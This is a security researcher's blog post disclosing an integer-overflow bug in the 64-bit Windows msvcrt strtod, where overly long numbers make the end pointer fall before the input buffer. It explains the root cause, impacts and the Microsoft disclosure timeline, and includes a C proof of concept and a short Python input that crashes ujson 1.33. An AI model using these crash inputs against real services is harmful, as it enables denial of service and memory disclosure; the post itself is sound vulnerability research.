Some time ago I was reading a random Python JSON parsing library which was partly implemented in C. At one point I thought I spotted a bug in custom float number parsing - I've written a short PoC to trigger it and it worked (i.e. crashed Python), but behaved differently than I expected it to and seemed to work only on Windows. So I got back to looking at the code and in the end decided it was only my imagination - there was no bug. So… why did that PoC actually work? It turned out that in some cases the library fell back to using the good-old strtod for float parsing instead and yes, there was a bug - in the underlying msvcrt.dll strtod implementation.

TL;DR

  • The strtod/et al. (string-to-double) has a char **endptr output parameter, in which it stores the address of the next character after the parsed/converted-to-double number in the input buffer. This parameter is used by parsers to determine where to continue parsing after a number has been read.
  • Since internally strtod (or actually _fltin2 and _wfltin2 which are used deep inside) uses a 32-bit int type to store the number-of-parsed-characters, the final calculation of endptr (startptr + number-of-parsed-characters) may result in an address that is outside (in front) of the input text buffer on 64-bit systems.
  • This results in introducing DoS class, information leak class, or other types of bugs in parsers that rely on strtod and the endptr parameter.

Note: Both glibc and MinGW (statically linked) strtod implementation don't have this bug - it's msvcr*.dll specific.
Note 2: PoCs are at the bottom.

Root cause

Direct problem is in the _flt structure used by _fltin2 and _wfltin2 functions, which are used to do the actual string-to-double conversion in strtod/etc (see Affected versions and functions below). This structure looks as follows (Visual C++ CRT source code, file \crt\src\fltintrn.h):

typedef struct _flt
{
       int flags;
       int nbytes;          /* number of characters read */
       long lval;
       double dval;         /* the returned floating point number */
}        *FLT;

This causes problems with overly long numbers on 64-bit platforms, since the nbytes might overflow (for numbers of length >= 2GB and < 4GB, etc), which leads to it having a negative or zero value.

This is problematic for strtod/et al., since they calculate the *endptr value in the following way (\crt\src\strtod.c):

       struct _flt answerstruct;
       FLT      answer;
...
       answer = _fltin2( &answerstruct, ptr, _loc_update.GetLocaleT());

       if ( endptr != NULL )
               *endptr = (char *) ptr + answer->nbytes;

A reasonably common way to use strtod in parsers (think: a JSON/XML/CSV/etc parser) is to do something like this:

...
if (looks_like_a_double(p)) {
 char *ep;
 val = strtod(p, &ep);
 // errno checking / usage of val here
 p = *ep;
 continue;
}
...

This in fact leads to p pointing outside of the buffer (up to 2GB in front of the buffer) and the parsing continues there.

Impact

Since this is a low-level library function the impact depends on what is it used for. Here are a couple of examples (assuming that strtod is part of a parser that is passed untrusted input, e.g. a JSON or CSV file):
  • Infinite loop DoS - if the input string is 4 GB long, the result end pointer will be identical as the start pointer, so the parser will jump into an infinite loop (strtod doesn't report any errors of course, since the number is correctly parsed)
  • Crash DoS - setting end pointer so that it points to an unallocated memory (e.g. for a number of length 2GB the end pointer will be start pointer minus 2GB, which probably points to some unallocated memory or isn't even a canonical pointer)
  • Information disclosure - since you could redirect the "read pointer" of the parser to any buffer in memory that is on lower addresses than the start pointer, you could make it read arbitrary data from memory; if the read data would be later reflected back, you could fetch it back.
  • Other - there might be other, less probable (but still possible) examples; one would be a more complicated scenario where the parsed text (code) is verified beforehand, and then parsed and executed. In such case this bug could be used to redirect the parser to jump into e.g. a middle of the string/comment containing unsafe code (similar to jumping in the middle of an instruction in ROP, but on scripting language level). This would make an awesome CTF challenge, but I don't expect it to be found in real products.

Affected versions and functions

64-bit Windows only.

This has been confirmed on:
  • default, fully patched Windows 7 msvcrt.dll
  • msvcr90.dll, msvcr110.dll
  • newest Visual Studio 2013 redistributables msvcr120.dll
  • Windows 8.1 (preview) default msvcrt.dll
I guess we can extrapolate this to "all 64-bit versions".

Affected functions (generally: everything that directly or indirectly uses _flt.nbytes for anything meaningful):
  • _fltin2/_wfltin2 - these incorrectly calculate the _flt.nbytes
  • _strtod_l/_wcstod_l - these directly use _flt.nbytes
  • strtod/wcstod - these are just wrappers for the above functions
  • _Stodx/_Stod/_Stofx/_Stof - these use strtod
Worth looking for variants (e.g. __strgtold12_l/__strgtold12?).

Proof of concept

This proof of concept prints the correct and strtod returned end pointer.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {

 // SZ == INT_MAX + some more bytes
#define SZ 0x80000016

 char *number = (char*)malloc(SZ);
 memset(number, '1', SZ);
 number[SZ-1] = 'm'; // Break syntax.
 number[1]    = '.'; // This is probably not needed.

 char *end_good   = number + SZ - 1;
 char *end_strtod;

 // strtod(number, &end_strtod); is OK too
 // ... unless you use MinGW which uses it's own strtod,
 // then it's better to just use _strtod_l for PoC.
 _strtod_l(number, &end_strtod, NULL);

 printf("number     = %p\n", number);
 printf("end_good   = %p\n", end_good);
 printf("end_strtod = %p\n", end_strtod);      

 // Example (faulty) results.
 // number     = 000000007FFF0040
 // end_good   = 00000000FFFF0055
 // end_strtod = FFFFFFFFFFFF0055

 return 0;
}

Real world example

A random JSON parser for Python with native code - ujson 1.33:

FASTCALL_ATTR JSOBJ FASTCALL_MSVC decodePreciseFloat(struct DecoderState *ds)
{
 char *end;
 double value;
 errno = 0;

 value = strtod(ds->start, &end);

 if (errno == ERANGE)
 {
   return SetError(ds, -1, "Range error when decoding numeric as double");
 }

 ds->start = end;
 return ds->dec->newDouble(ds->prv, value);
}

And a crash DoS PoC in Python (2.7 AMD64):

import ujson

n = "4." + "3"*0x7fffffff
x = ujson.loads(n, precise_float=True)

WinDBG says:

(2088.1fa4): Access violation - code c0000005 (first chance)
ujson!JSON_DecodeObject+0x8c:
00000001`800050dc 8a0a            mov     cl,byte ptr [rdx] ds:00000001`00010061=??
(rdx==0x100010061)

Report

I've reported the bug to Microsoft and the decision was to fix it in the future releases of Microsoft Visual C++ / Microsoft Windows. I think that's OK, especially taking into account that the possibility of severe vulnerabilities appearing as a result of this Microsoft C runtime library bug is minimal (that said, if you find one, let me know ;>).

Timeline

Note: A lot of e-mails were flying back and forth, so I'm not going to list all dates.

2013-Aug-21: Send the report to Microsoft.
2013-Sep-17: Confirmation that the bugs works as described and are planned to be fixed.
2013-Oct-26: More information - the bug will be fixed in the next versions of msvcr*.dll.
2013-Nov-13: Microsoft receives the draft of this blog post from me for comments.
2013-Nov-23: Blogpost is public.

And that's it.

Comments:

2013-11-23 10:57:23 = Wlfrn
{
#include <stdio.h> missing?
}
2013-11-23 20:24:03 = Gynvael Coldwind
{
@Wlfrn
Thanks! Fixed :)
}
2013-11-25 20:04:13 = gim
{
if anyone is parsing >2G json file (or any other 'number', that is 2G long), he should be shoot down immediately ;)
}
2013-12-18 08:19:04 = Hey Dude
{
gim, it appears that Microsoft agree with you.
}

Add a comment:

Nick:
URL (optional):
Math captcha: 5 ∗ 4 + 2 =